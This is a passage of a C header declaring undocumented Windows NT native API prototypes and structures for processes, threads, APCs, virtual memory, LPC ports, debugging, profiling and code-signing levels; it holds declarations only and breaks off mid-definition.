#define PS_REQUEST_BREAKAWAY 1
#define PS_NO_DEBUG_INHERIT 2
#define PS_INHERIT_HANDLES 4
#define PS_LARGE_PAGES 8
#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
    PS_NO_DEBUG_INHERIT | \
    PS_INHERIT_HANDLES | \
    PS_LARGE_PAGES)

NTSYSAPI
NTSTATUS
NTAPI
NtGetNextProcess(
    _In_opt_ HANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ULONG HandleAttributes,
    _In_ ULONG Flags,
    _Out_ PHANDLE NewProcessHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtGetNextThread(
    _In_ HANDLE ProcessHandle,
    _In_ HANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ULONG HandleAttributes,
    _In_ ULONG Flags,
    _Out_ PHANDLE NewThreadHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateProcess(
    _Out_ PHANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ParentProcess,
    _In_ BOOLEAN InheritObjectTable,
    _In_opt_ HANDLE SectionHandle,
    _In_opt_ HANDLE DebugPort,
    _In_opt_ HANDLE ExceptionPort);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateProcessEx(
    _Out_ PHANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ParentProcess,
    _In_ ULONG Flags,
    _In_opt_ HANDLE SectionHandle,
    _In_opt_ HANDLE DebugPort,
    _In_opt_ HANDLE ExceptionPort,
    _In_ BOOLEAN InJob);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateUserProcess(
    _Out_ PHANDLE ProcessHandle,
    _Out_ PHANDLE ThreadHandle,
    _In_ ACCESS_MASK ProcessDesiredAccess,
    _In_ ACCESS_MASK ThreadDesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes,
    _In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes,
    _In_ ULONG ProcessFlags,
    _In_ ULONG ThreadFlags,
    _In_opt_ PVOID ProcessParameters,
    _Inout_ PPS_CREATE_INFO CreateInfo,
    _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateThread(
    _Out_ PHANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _Out_ PCLIENT_ID ClientId,
    _In_ PCONTEXT ThreadContext,
    _In_ PINITIAL_TEB InitialTeb,
    _In_ BOOLEAN CreateSuspended);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateThreadEx(
    _Out_ PHANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _In_ PVOID StartRoutine,
    _In_opt_ PVOID Argument,
    _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
    _In_opt_ ULONG_PTR ZeroBits,
    _In_opt_ SIZE_T StackSize,
    _In_opt_ SIZE_T MaximumStackSize,
    _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess(
    _Out_ PHANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PCLIENT_ID ClientId);

NTSYSAPI
NTSTATUS
NTAPI
NtTerminateProcess(
    _In_opt_ HANDLE ProcessHandle,
    _In_ NTSTATUS ExitStatus);

NTSYSAPI
NTSTATUS
NTAPI
NtSuspendProcess(
    _In_ HANDLE ProcessHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtResumeProcess(
    _In_ HANDLE ProcessHandle);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateProcessStateChange(
    _Out_ PHANDLE ProcessStateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _In_opt_ ULONG64 Reserved);

NTSYSAPI
NTSTATUS
NTAPI
NtChangeProcessState(
    _In_ HANDLE ProcessStateChangeHandle,
    _In_ HANDLE ProcessHandle,
    _In_ PROCESS_STATE_CHANGE_TYPE StateChangeType,
    _In_opt_ PVOID ExtendedInformation,
    _In_opt_ SIZE_T ExtendedInformationLength,
    _In_opt_ ULONG64 Reserved);

NTSYSAPI
NTSTATUS
NTAPI
NtSuspendThread(
    _In_ HANDLE ThreadHandle,
    _Out_opt_ PULONG PreviousSuspendCount);

NTSYSAPI
NTSTATUS
NTAPI
NtResumeThread(
    _In_ HANDLE ThreadHandle,
    _Out_opt_ PULONG PreviousSuspendCount);

NTSYSAPI
NTSTATUS
NTAPI
NtCreateThreadStateChange(
    _Out_ PHANDLE ThreadStateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ThreadHandle,
    _In_opt_ ULONG64 Reserved);

NTSYSAPI
NTSTATUS
NTAPI
NtChangeThreadState(
    _In_ HANDLE ThreadStateChangeHandle,
    _In_ HANDLE ThreadHandle,
    _In_ THREAD_STATE_CHANGE_TYPE StateChangeType,
    _In_opt_ PVOID ExtendedInformation,
    _In_opt_ SIZE_T ExtendedInformationLength,
    _In_opt_ ULONG64 Reserved);

NTSYSAPI
NTSTATUS
NTAPI
NtOpenThread(
    _Out_ PHANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PCLIENT_ID ClientId);

NTSYSAPI
NTSTATUS
NTAPI
NtTerminateThread(
    _In_opt_ HANDLE ThreadHandle,
    _In_ NTSTATUS ExitStatus);

NTSYSAPI
NTSTATUS
NTAPI
NtImpersonateThread(
    _In_ HANDLE ServerThreadHandle,
    _In_ HANDLE ClientThreadHandle,
    _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos);

NTSYSAPI
NTSTATUS
NTAPI
NtSetContextThread(
    _In_ HANDLE ThreadHandle,
    _In_ PCONTEXT ThreadContext);

NTSYSAPI
NTSTATUS
NTAPI
NtGetContextThread(
    _In_ HANDLE ThreadHandle,
    _Inout_ PCONTEXT ThreadContext);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationThread(
    _In_ HANDLE ThreadHandle,
    _In_ THREADINFOCLASS ThreadInformationClass,
    _Out_writes_bytes_(ThreadInformationLength) PVOID ThreadInformation,
    _In_ ULONG ThreadInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationThread(
    _In_ HANDLE ThreadHandle,
    _In_ THREADINFOCLASS ThreadInformationClass,
    _In_reads_bytes_(ThreadInformationLength) PVOID ThreadInformation,
    _In_ ULONG ThreadInformationLength);

NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationProcess(
    _In_ HANDLE ProcessHandle,
    _In_ PROCESSINFOCLASS ProcessInformationClass,
    _Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,
    _In_ ULONG ProcessInformationLength,
    _Out_opt_ PULONG ReturnLength);

NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationProcess(
    _In_ HANDLE ProcessHandle,
    _In_ PROCESSINFOCLASS ProcessInformationClass,
    _In_reads_bytes_(ProcessInformationLength) PVOID ProcessInformation,
    _In_ ULONG ProcessInformationLength);

typedef VOID(*PPS_APC_ROUTINE) (
    _In_opt_ PVOID ApcArgument1,
    _In_opt_ PVOID ApcArgument2,
    _In_opt_ PVOID ApcArgument3);

NTSYSAPI
NTSTATUS
NTAPI
NtQueueApcThread(
    _In_ HANDLE ThreadHandle,
    _In_ PPS_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcArgument1,
    _In_opt_ PVOID ApcArgument2,
    _In_opt_ PVOID ApcArgument3);

NTSYSAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx(
    _In_ HANDLE ThreadHandle,
    _In_opt_ HANDLE ReserveHandle,
    _In_
PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcArgument1, _In_opt_ PVOID ApcArgument2, _In_opt_ PVOID ApcArgument3); NTSYSAPI NTSTATUS NTAPI NtQueueApcThreadEx2( _In_ HANDLE ThreadHandle, _In_ HANDLE UserApcReserveHandle, _In_ ULONG QueueUserApcFlags, /*QUEUE_USER_APC_FLAGS*/ _In_ PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID SystemArgument1, _In_opt_ PVOID SystemArgument2, _In_opt_ PVOID SystemArgument3); NTSYSAPI NTSTATUS NTAPI NtYieldExecution( VOID); NTSYSAPI NTSTATUS NTAPI NtTestAlert( VOID); NTSYSAPI NTSTATUS NTAPI NtAlertThread( _In_ HANDLE ThreadHandle); NTSYSAPI NTSTATUS NTAPI NtAlertResumeThread( _In_ HANDLE ThreadHandle, _Out_opt_ PULONG PreviousSuspendCount); NTSYSAPI NTSTATUS NTAPI NtAlertThreadByThreadId( _In_ HANDLE ThreadId); NTSYSAPI NTSTATUS NTAPI NtWaitForAlertByThreadId( _In_ PVOID Address, _In_opt_ PLARGE_INTEGER Timeout); NTSYSAPI NTSTATUS NTAPI NtDelayExecution( _In_ BOOLEAN Alertable, _In_opt_ PLARGE_INTEGER DelayInterval); NTSYSAPI ULONG NTAPI NtGetCurrentProcessorNumber( VOID); /************************************************************************************ * * License API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtQueryLicenseValue( _In_ PUNICODE_STRING ValueName, _Out_opt_ PULONG Type, _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data, _In_ ULONG DataSize, _Out_ PULONG ResultDataSize); /************************************************************************************ * * Virtual Memory API. 
* ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtAllocateVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG Protect); NTSYSAPI NTSTATUS NTAPI NtAllocateVirtualMemoryEx( _In_ HANDLE ProcessHandle, _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress, _Inout_ PSIZE_T RegionSize, _In_ ULONG AllocationType, _In_ ULONG PageProtection, _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters, _In_ ULONG ExtendedParameterCount); NTSYSAPI NTSTATUS NTAPI NtFreeVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _Inout_ PSIZE_T RegionSize, _In_ ULONG FreeType); NTSYSAPI NTSTATUS NTAPI NtQueryVirtualMemory( _In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress, _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass, _Out_writes_bytes_(MemoryInformationLength) PVOID MemoryInformation, _In_ SIZE_T MemoryInformationLength, _Out_opt_ PSIZE_T ReturnLength); NTSYSAPI NTSTATUS NTAPI NtSetInformationVirtualMemory( _In_ HANDLE ProcessHandle, _In_ VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass, _In_ ULONG_PTR NumberOfEntries, _In_reads_(NumberOfEntries) PMEMORY_RANGE_ENTRY VirtualAddresses, _In_reads_bytes_(VmInformationLength) PVOID VmInformation, _In_ ULONG VmInformationLength); NTSYSAPI NTSTATUS NTAPI NtReadVirtualMemory( _In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress, _Out_writes_bytes_(BufferSize) PVOID Buffer, _In_ SIZE_T BufferSize, _Out_opt_ PSIZE_T NumberOfBytesRead); NTSYSAPI NTSTATUS NTAPI NtReadVirtualMemoryEx( _In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress, _Out_writes_bytes_(BufferSize) PVOID Buffer, _In_ SIZE_T BufferSize, 
_Out_opt_ PSIZE_T NumberOfBytesRead, _In_ ULONG Flags); NTSYSAPI NTSTATUS NTAPI NtWriteVirtualMemory( _In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress, _In_reads_bytes_(BufferSize) PVOID Buffer, _In_ SIZE_T BufferSize, _Out_opt_ PSIZE_T NumberOfBytesWritten); NTSYSAPI NTSTATUS NTAPI NtProtectVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _Inout_ PSIZE_T RegionSize, _In_ ULONG NewProtect, _Out_ PULONG OldProtect); #define MAP_PROCESS 1L #define MAP_SYSTEM 2L NTSYSAPI NTSTATUS NTAPI NtLockVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _Inout_ PSIZE_T RegionSize, _In_ ULONG MapType); NTSYSAPI NTSTATUS NTAPI NtUnlockVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ PVOID *BaseAddress, _Inout_ PSIZE_T RegionSize, _In_ ULONG MapType); NTSTATUS NTAPI NtFlushVirtualMemory( _In_ HANDLE ProcessHandle, _Inout_ PVOID* BaseAddress, _Inout_ PSIZE_T RegionSize, _Out_ struct _IO_STATUS_BLOCK* IoStatus); NTSYSAPI NTSTATUS NTAPI NtFlushInstructionCache( _In_ HANDLE ProcessHandle, _In_opt_ PVOID BaseAddress, _In_ SIZE_T Length); NTSYSAPI NTSTATUS NTAPI NtCreatePagingFile( _In_ PUNICODE_STRING PageFileName, _In_ PLARGE_INTEGER MinimumSize, _In_ PLARGE_INTEGER MaximumSize, _In_ ULONG Priority); /************************************************************************************ * * Port API. * ************************************************************************************/ typedef struct _PORT_VIEW { ULONG Length; // Size of this structure HANDLE SectionHandle; // Handle to section object with // SECTION_MAP_WRITE and SECTION_MAP_READ ULONG SectionOffset; // The offset in the section to map a view for // the port data area. The offset must be aligned // with the allocation granularity of the system. SIZE_T ViewSize; // The size of the view (in bytes) PVOID ViewBase; // The base address of the view in the creator // PVOID ViewRemoteBase; // The base address of the view in the process // connected to the port. 
} PORT_VIEW, * PPORT_VIEW; typedef struct _REMOTE_PORT_VIEW { ULONG Length; // Size of this structure SIZE_T ViewSize; // The size of the view (bytes) PVOID ViewBase; // Base address of the view } REMOTE_PORT_VIEW, * PREMOTE_PORT_VIEW; typedef struct _PORT_MESSAGE { union { struct { CSHORT DataLength; CSHORT TotalLength; } s1; ULONG Length; } u1; union { struct { CSHORT Type; CSHORT DataInfoOffset; } s2; ULONG ZeroInit; } u2; union { CLIENT_ID ClientId; double DoNotUseThisField; // Force quadword alignment } u3; ULONG MessageId; union { SIZE_T ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message ULONG CallbackId; // Only valid on LPC_REQUEST message } u4; } PORT_MESSAGE, *PPORT_MESSAGE; typedef struct _PORT_MESSAGE32 { union { struct { CSHORT DataLength; CSHORT TotalLength; } s1; ULONG Length; } u1; union { struct { CSHORT Type; CSHORT DataInfoOffset; } s2; ULONG ZeroInit; } u2; union { CLIENT_ID32 ClientId; double DoNotUseThisField; // Force quadword alignment } u3; ULONG MessageId; union { ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message ULONG CallbackId; // Only valid on LPC_REQUEST message } u4; } PORT_MESSAGE32, * PPORT_MESSAGE32; typedef struct _PORT_MESSAGE64 { union { struct { CSHORT DataLength; CSHORT TotalLength; } s1; ULONG Length; } u1; union { struct { CSHORT Type; CSHORT DataInfoOffset; } s2; ULONG ZeroInit; } u2; union { CLIENT_ID64 ClientId; double DoNotUseThisField; }; ULONG MessageId; union { ULONGLONG ClientViewSize; // only valid for LPC_CONNECTION_REQUEST messages ULONG CallbackId; // only valid for LPC_REQUEST messages }; } PORT_MESSAGE64, * PPORT_MESSAGE64; typedef struct _PORT_DATA_ENTRY { PVOID Base; ULONG Size; } PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; typedef struct _PORT_DATA_INFORMATION { ULONG CountDataEntries; PORT_DATA_ENTRY DataEntries[1]; } PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; #ifndef InitializeMessageHeader #define InitializeMessageHeader(ph, l, t) \ { \ (ph)->u1.s1.TotalLength = (USHORT)(l); 
\ (ph)->u1.s1.DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \ (ph)->u2.s2.Type = (USHORT)(t); \ (ph)->u2.s2.DataInfoOffset = 0; \ (ph)->ClientId.UniqueProcess = NULL; \ (ph)->ClientId.UniqueThread = NULL; \ (ph)->MessageId = 0; \ (ph)->ClientViewSize = 0; \ } #endif #define LPC_REQUEST 1 #define LPC_REPLY 2 #define LPC_DATAGRAM 3 #define LPC_LOST_REPLY 4 #define LPC_PORT_CLOSED 5 #define LPC_CLIENT_DIED 6 #define LPC_EXCEPTION 7 #define LPC_DEBUG_EVENT 8 #define LPC_ERROR_EVENT 9 #define LPC_CONNECTION_REQUEST 10 #define LPC_CONTINUATION_REQUIRED 0x2000 #define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE) #define PORT_MAXIMUM_MESSAGE_LENGTH 256 typedef struct _LPC_CLIENT_DIED_MSG { PORT_MESSAGE PortMsg; LARGE_INTEGER CreateTime; } LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG; NTSYSAPI NTSTATUS NTAPI NtCreatePort( _Out_ PHANDLE PortHandle, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ ULONG MaxConnectionInfoLength, _In_ ULONG MaxMessageLength, _In_ ULONG MaxPoolUsage); NTSYSAPI NTSTATUS NTAPI NtCompleteConnectPort( _In_ HANDLE PortHandle); NTSYSAPI NTSTATUS NTAPI NtListenPort( _In_ HANDLE PortHandle, _Out_ PPORT_MESSAGE ConnectionRequest); NTSYSAPI NTSTATUS NTAPI NtReplyPort( _In_ HANDLE PortHandle, _In_ PPORT_MESSAGE ReplyMessage); NTSYSAPI NTSTATUS NTAPI NtReplyWaitReplyPort( _In_ HANDLE PortHandle, _Inout_ PPORT_MESSAGE ReplyMessage); NTSYSAPI NTSTATUS NTAPI NtRequestPort( _In_ HANDLE PortHandle, _In_ PPORT_MESSAGE RequestMessage); NTSYSAPI NTSTATUS NTAPI NtRequestWaitReplyPort( _In_ HANDLE PortHandle, _In_ PPORT_MESSAGE RequestMessage, _Out_ PPORT_MESSAGE ReplyMessage); NTSYSAPI NTSTATUS NTAPI NtClosePort( _In_ HANDLE PortHandle); NTSYSAPI NTSTATUS NTAPI NtReplyWaitReceivePort( _In_ HANDLE PortHandle, _Out_opt_ PVOID *PortContext, _In_opt_ PPORT_MESSAGE ReplyMessage, _Out_ PPORT_MESSAGE ReceiveMessage); NTSYSAPI NTSTATUS NTAPI NtWriteRequestData( _In_ HANDLE PortHandle, _In_ PPORT_MESSAGE Message, _In_ ULONG DataEntryIndex, _In_ PVOID Buffer, _In_ ULONG 
BufferSize, _Out_opt_ PULONG NumberOfBytesWritten); NTSYSAPI NTSTATUS NTAPI NtReadRequestData( _In_ HANDLE PortHandle, _In_ PPORT_MESSAGE Message, _In_ ULONG DataEntryIndex, _Out_ PVOID Buffer, _In_ ULONG BufferSize, _Out_opt_ PULONG NumberOfBytesRead); NTSYSAPI NTSTATUS NTAPI NtConnectPort( _Out_ PHANDLE PortHandle, _In_ PUNICODE_STRING PortName, _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, _Inout_opt_ PPORT_VIEW ClientView, _Out_opt_ PREMOTE_PORT_VIEW ServerView, _Out_opt_ PULONG MaxMessageLength, _Inout_opt_ PVOID ConnectionInformation, _Inout_opt_ PULONG ConnectionInformationLength); NTSYSAPI NTSTATUS NTAPI NtAcceptConnectPort( _Out_ PHANDLE PortHandle, _In_opt_ PVOID PortContext, _In_ PPORT_MESSAGE ConnectionRequest, _In_ BOOLEAN AcceptConnection, _Inout_opt_ PPORT_VIEW ServerView, _Out_opt_ PREMOTE_PORT_VIEW ClientView); NTSYSAPI NTSTATUS NTAPI NtSecureConnectPort( _Out_ PHANDLE PortHandle, _In_ PUNICODE_STRING PortName, _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos, _Inout_opt_ PPORT_VIEW ClientView, _In_opt_ PSID RequiredServerSid, _Inout_opt_ PREMOTE_PORT_VIEW ServerView, _Out_opt_ PULONG MaxMessageLength, _Inout_opt_ PVOID ConnectionInformation, _Inout_opt_ PULONG ConnectionInformationLength); /************************************************************************************ * * Boot Management API. * ************************************************************************************/ NTSYSAPI NTSTATUS NTAPI NtEnumerateBootEntries( _Out_writes_bytes_opt_(*BufferLength) PVOID Buffer, _Inout_ PULONG BufferLength); /************************************************************************************ * * Reserve Objects API. 
* ************************************************************************************/ typedef enum _MEMORY_RESERVE_TYPE { MemoryReserveUserApc, MemoryReserveIoCompletion, MemoryReserveTypeMax } MEMORY_RESERVE_TYPE; NTSYSAPI NTSTATUS NTAPI NtAllocateReserveObject( _Out_ PHANDLE MemoryReserveHandle, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ MEMORY_RESERVE_TYPE Type); /************************************************************************************ * * Debug API. * ************************************************************************************/ // // Define the debug object thats used to attatch to processes that are being debugged. // #define DEBUG_OBJECT_DELETE_PENDING (0x1) // Debug object is delete pending. #define DEBUG_OBJECT_KILL_ON_CLOSE (0x2) // Kill all debugged processes on close typedef struct _DEBUG_OBJECT { // // Event thats set when the EventList is populated. // KEVENT EventsPresent; // // Mutex to protect the structure // FAST_MUTEX Mutex; // // Queue of events waiting for debugger intervention // LIST_ENTRY EventList; // // Flags for the object // ULONG Flags; } DEBUG_OBJECT, *PDEBUG_OBJECT; typedef enum _DEBUGOBJECTINFOCLASS { DebugObjectUnusedInformation, DebugObjectKillProcessOnExitInformation, MaxDebugObjectInfoClass } DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS; typedef struct _DBGKM_EXCEPTION { EXCEPTION_RECORD ExceptionRecord; ULONG FirstChance; } DBGKM_EXCEPTION, * PDBGKM_EXCEPTION; typedef struct _DBGKM_CREATE_THREAD { ULONG SubSystemKey; PVOID StartAddress; } DBGKM_CREATE_THREAD, * PDBGKM_CREATE_THREAD; typedef struct _DBGKM_CREATE_PROCESS { ULONG SubSystemKey; HANDLE FileHandle; PVOID BaseOfImage; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; DBGKM_CREATE_THREAD InitialThread; } DBGKM_CREATE_PROCESS, * PDBGKM_CREATE_PROCESS; typedef struct _DBGKM_EXIT_THREAD { NTSTATUS ExitStatus; } DBGKM_EXIT_THREAD, * PDBGKM_EXIT_THREAD; typedef struct _DBGKM_EXIT_PROCESS { NTSTATUS ExitStatus; } DBGKM_EXIT_PROCESS, * 
PDBGKM_EXIT_PROCESS; typedef struct _DBGKM_LOAD_DLL { HANDLE FileHandle; PVOID BaseOfDll; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; PVOID NamePointer; } DBGKM_LOAD_DLL, * PDBGKM_LOAD_DLL; typedef struct _DBGKM_UNLOAD_DLL { PVOID BaseAddress; } DBGKM_UNLOAD_DLL, * PDBGKM_UNLOAD_DLL; typedef enum _DBG_STATE { DbgIdle, DbgReplyPending, DbgCreateThreadStateChange, DbgCreateProcessStateChange, DbgExitThreadStateChange, DbgExitProcessStateChange, DbgExceptionStateChange, DbgBreakpointStateChange, DbgSingleStepStateChange, DbgLoadDllStateChange, DbgUnloadDllStateChange } DBG_STATE, * PDBG_STATE; typedef struct _DBGUI_CREATE_THREAD { HANDLE HandleToThread; DBGKM_CREATE_THREAD NewThread; } DBGUI_CREATE_THREAD, * PDBGUI_CREATE_THREAD; typedef struct _DBGUI_CREATE_PROCESS { HANDLE HandleToProcess; HANDLE HandleToThread; DBGKM_CREATE_PROCESS NewProcess; } DBGUI_CREATE_PROCESS, * PDBGUI_CREATE_PROCESS; typedef struct _DBGUI_WAIT_STATE_CHANGE { DBG_STATE NewState; CLIENT_ID AppClientId; union { DBGKM_EXCEPTION Exception; DBGUI_CREATE_THREAD CreateThread; DBGUI_CREATE_PROCESS CreateProcessInfo; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; } StateInfo; } DBGUI_WAIT_STATE_CHANGE, * PDBGUI_WAIT_STATE_CHANGE; NTSYSAPI NTSTATUS NTAPI NtCreateDebugObject( _Out_ PHANDLE DebugObjectHandle, _In_ ACCESS_MASK DesiredAccess, _In_ POBJECT_ATTRIBUTES ObjectAttributes, _In_ ULONG Flags); NTSYSAPI NTSTATUS NTAPI NtSetInformationDebugObject( _In_ HANDLE DebugObjectHandle, _In_ DEBUGOBJECTINFOCLASS DebugObjectInformationClass, _In_reads_bytes_(DebugInformationLength) PVOID DebugInformation, _In_ ULONG DebugInformationLength, _Out_opt_ PULONG ReturnLength); NTSYSAPI NTSTATUS NTAPI NtDebugActiveProcess( _In_ HANDLE ProcessHandle, _In_ HANDLE DebugObjectHandle); NTSYSAPI NTSTATUS NTAPI NtDebugContinue( _In_ HANDLE DebugObjectHandle, _In_ PCLIENT_ID ClientId, _In_ NTSTATUS ContinueStatus); NTSYSAPI NTSTATUS NTAPI 
NtWaitForDebugEvent( _In_ HANDLE DebugObjectHandle, _In_ BOOLEAN Alertable, _In_opt_ PLARGE_INTEGER Timeout, _Out_ PDBGUI_WAIT_STATE_CHANGE WaitStateChange ); NTSYSAPI NTSTATUS NTAPI NtRemoveProcessDebug( _In_ HANDLE ProcessHandle, _In_ HANDLE DebugObjectHandle); NTSYSAPI NTSTATUS NTAPI NtQueryDebugFilterState( _In_ ULONG ComponentId, _In_ ULONG Level); NTSYSAPI NTSTATUS NTAPI NtSetDebugFilterState( _In_ ULONG ComponentId, _In_ ULONG Level, _In_ BOOLEAN State); /************************************************************************************ * * Profile API. * ************************************************************************************/ typedef enum _KPROFILE_SOURCE { ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum } KPROFILE_SOURCE; NTSYSAPI NTSTATUS NTAPI NtCreateProfile( _Out_ PHANDLE ProfileHandle, _In_opt_ HANDLE Process, _In_ PVOID ProfileBase, _In_ SIZE_T ProfileSize, _In_ ULONG BucketSize, _In_reads_bytes_(BufferSize) PULONG Buffer, _In_ ULONG BufferSize, _In_ KPROFILE_SOURCE ProfileSource, _In_ KAFFINITY Affinity); NTSYSAPI NTSTATUS NTAPI NtStartProfile( _In_ HANDLE ProfileHandle); NTSYSAPI NTSTATUS NTAPI NtStopProfile( _In_ HANDLE ProfileHandle); NTSYSAPI NTSTATUS NTAPI NtQueryIntervalProfile( _In_ KPROFILE_SOURCE ProfileSource, _Out_ PULONG Interval); NTSYSAPI NTSTATUS NTAPI NtSetIntervalProfile( _In_ ULONG Interval, _In_ KPROFILE_SOURCE Source); /************************************************************************************ * * Signing Levels 
API. * ************************************************************************************/ typedef UCHAR SE_SIGNING_LEVEL, *PSE_SIGNING_LEVEL; typedef struct _SE_FILE_CACHE_CLAIM_INFORMATION { ULONG Size; PVOID Claim; } SE_FILE_CACHE_CLAIM_INFORMATION, *PSE_FILE_CACHE_CLAIM_INFORMATION; typedef struct _SE_SET_FILE_CACHE_INFORMATION { ULONG Size; UNICODE_STRING CatalogDirectoryPath; SE_FILE_CACHE_CLAIM_INFORMATION OriginClaimInfo; } SE_SET_FILE_CACHE_INFORMATION, *PSE_SET_FILE_CACHE_INFORMATION; #ifndef SE_SIGNING_LEVEL_UNCHECKED #define SE_SIGNING_LEVEL_UNCHECKED 0x00000000 #endif #ifndef SE_SIGNING_LEVEL_UNSIGNED #define SE_SIGNING_LEVEL_UNSIGNED 0x00000001 #endif #ifndef SE_SIGNING_LEVEL_ENTERPRISE #define SE_SIGNING_LEVEL_ENTERPRISE 0x00000002 #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_1 #define SE_SIGNING_LEVEL_CUSTOM_1 0x00000003 #endif #ifndef SE_SIGNING_LEVEL_DEVELOPER #define SE_SIGNING_LEVEL_DEVELOPER SE_SIGNING_LEVEL_CUSTOM_1 #endif #ifndef SE_SIGNING_LEVEL_AUTHENTICODE #define SE_SIGNING_LEVEL_AUTHENTICODE 0x00000004 #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_2 #define SE_SIGNING_LEVEL_CUSTOM_2 0x00000005 #endif #ifndef SE_SIGNING_LEVEL_STORE #define SE_SIGNING_LEVEL_STORE 0x00000006 #endif #ifndef SE_SIGNING_LEVEL_CUSTOM_3 #define SE_SIGNING_LEVEL_CUSTOM_3 0x00000007 #endif #ifndef SE_SIGNING_LEVEL_ANTIMALWARE #define SE_SIGNING_LEVEL_ANTIMALWARE SE_SIGNING_LEVEL_CUSTOM_3 #endif #ifndef SE_SIGNING_LEVEL_MICROSOFT #define 